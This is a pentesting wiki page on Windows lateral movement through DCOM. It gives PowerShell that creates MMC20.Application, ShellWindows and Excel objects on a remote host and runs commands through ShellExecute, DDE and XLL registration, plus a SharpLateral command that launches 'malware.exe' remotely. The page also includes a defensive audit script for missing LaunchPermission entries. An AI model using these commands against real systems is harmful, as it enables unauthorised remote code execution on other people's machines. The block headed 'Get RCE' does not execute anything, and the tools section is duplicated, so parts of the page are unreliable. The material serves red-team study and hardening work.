# DCOM Exec
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
## MMC20.Application
For more information about this technique check the original post at https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Distributed Component Object Model (DCOM) objects present an interesting capability for network-based interaction with objects. Microsoft provides comprehensive documentation for both DCOM and the Component Object Model (COM), accessible here for DCOM and here for COM. A list of DCOM applications can be retrieved with the following PowerShell command:
```powershell
Get-CimInstance Win32_DCOMApplication
```
The COM object MMC Application Class (MMC20.Application) enables scripting of MMC snap-in operations. Notably, this object exposes an ExecuteShellCommand method under Document.ActiveView. More information about this method can be found here. Check it running:

This feature allows commands to be executed over the network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be used as follows:
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
```
This command connects to the DCOM application and returns an instance of the COM object. The ExecuteShellCommand method can then be invoked to execute a process on the remote host. The process involves the following steps:

Check the methods:

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member
```

Get RCE:

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member
# Then just run something like:
ls \\10.10.10.10\c$\Users
```
## ShellWindows & ShellBrowserWindow
For more information about this technique check the original post at https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

The MMC20.Application object was found to lack explicit "LaunchPermissions", falling back to default permissions that allow Administrators access. For further details, the thread can be explored here, and the use of @tiraniddo's OleView .NET to filter objects without an explicit Launch Permission is recommended.

Two specific objects, ShellBrowserWindow and ShellWindows, were highlighted due to their lack of explicit Launch Permissions. The absence of a LaunchPermission registry entry under HKCR:\AppID\{guid} indicates that no explicit permissions are set.
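As an added example (not from the original post or from the tools it references), the following PowerShell snippet inventories the local machine for DCOM AppIDs whose registry key carries no explicit LaunchPermission value, which is exactly the condition discussed above. It assumes it runs on the host being audited with read access to HKEY_CLASSES_ROOT\AppID; it only reads registry values and never activates any COM or DCOM object, so it is a defensive check that a blue team can run to see which AppIDs fall back to the machine-wide default launch permission.

```powershell
# Added example: audit DCOM AppIDs for a missing explicit LaunchPermission (defensive inventory).
# Assumptions: runs on the host being audited, with read access to HKEY_CLASSES_ROOT\AppID.
# It only reads registry values; it does not activate any COM/DCOM object.

# Map AppID -> application name using the same WMI class the page uses to list DCOM applications.
$names = @{}
Get-CimInstance Win32_DCOMApplication | ForEach-Object { $names[$_.AppID] = $_.Name }

$findings = Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT\AppID' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^\{[0-9A-Fa-f-]{36}\}$' } |
    ForEach-Object {
        $appId = $_.PSChildName
        $props = Get-ItemProperty -LiteralPath $_.PSPath -ErrorAction SilentlyContinue

        # Prefer the WMI name; fall back to the key's default value if WMI has no entry.
        $name = $names[$appId]
        if (-not $name) { $name = $props.'(default)' }

        [PSCustomObject]@{
            AppID               = $appId
            Name                = $name
            # LaunchPermission / AccessPermission are REG_BINARY security descriptors when present.
            HasLaunchPermission = $null -ne $props.LaunchPermission
            HasAccessPermission = $null -ne $props.AccessPermission
            RunAs               = $props.RunAs
        }
    }

# AppIDs with no explicit LaunchPermission fall back to the machine-wide default
# (HKLM:\SOFTWARE\Microsoft\Ole\DefaultLaunchPermission). As the page notes for
# MMC20.Application, ShellWindows and ShellBrowserWindow, that default grants Administrators access.
$noLaunchPerm = $findings | Where-Object { -not $_.HasLaunchPermission } | Sort-Object Name

"{0} of {1} AppIDs have no explicit LaunchPermission" -f @($noLaunchPerm).Count, @($findings).Count
$noLaunchPerm | Format-Table -AutoSize
```

The output is a triage list rather than a verdict: an AppID without an explicit LaunchPermission is only reachable remotely by whoever the machine-wide default (and the firewall and local group membership) allows, so each hit should be compared against the hardened descriptor you intend for it in dcomcnfg or, for deeper inspection of the descriptors themselves, with the OleView .NET tool the page recommends.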
### ShellWindows
For ShellWindows, which has no ProgID, the .NET methods Type.GetTypeFromCLSID and Activator.CreateInstance allow the object to be instantiated using its AppID. This process uses OleView .NET to retrieve the CLSID of ShellWindows. Once instantiated, interaction is possible through the WindowsShell.Item method, leading to method invocations such as Document.Application.ShellExecute.

Example PowerShell commands were provided to instantiate the object and execute commands remotely:

```powershell
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
```
## Lateral Movement with Excel DCOM Objects
Lateral movement can be achieved by abusing DCOM Excel objects. For detailed information, it is advisable to read the discussion on leveraging Excel DDE for lateral movement via DCOM on Cybereason's blog.

The Empire project provides a PowerShell script that demonstrates the use of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available in Empire's GitHub repository, showing different methods of abusing Excel for RCE:
```powershell
# Detection of Office version
elseif ($Method -Match "DetectOffice") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $isx64 = [boolean]$obj.Application.ProductCode[21]
    Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
# Registration of an XLL
elseif ($Method -Match "RegisterXLL") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $obj.Application.RegisterXLL("$DllPath")
}
# Execution of a command via Excel DDE
elseif ($Method -Match "ExcelDDE") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $Obj.DisplayAlerts = $false
    $Obj.DDEInitiate("cmd", "/c $Command")
}
```
## Lateral Movement Tools

Two tools are highlighted for automating these techniques:

- Invoke-DCOM.ps1: A PowerShell script provided by the Empire project that simplifies the invocation of the different methods for executing code on remote machines. This script is available in the Empire GitHub repository.
- SharpLateral: A tool designed for executing code remotely, which can be used with the command:

```
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```

## Automatic Tools

- The PowerShell script Invoke-DCOM.ps1 makes it easy to invoke all the listed methods for executing code on other machines.
- You can also use SharpLateral:

```
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```
## References
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
- https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/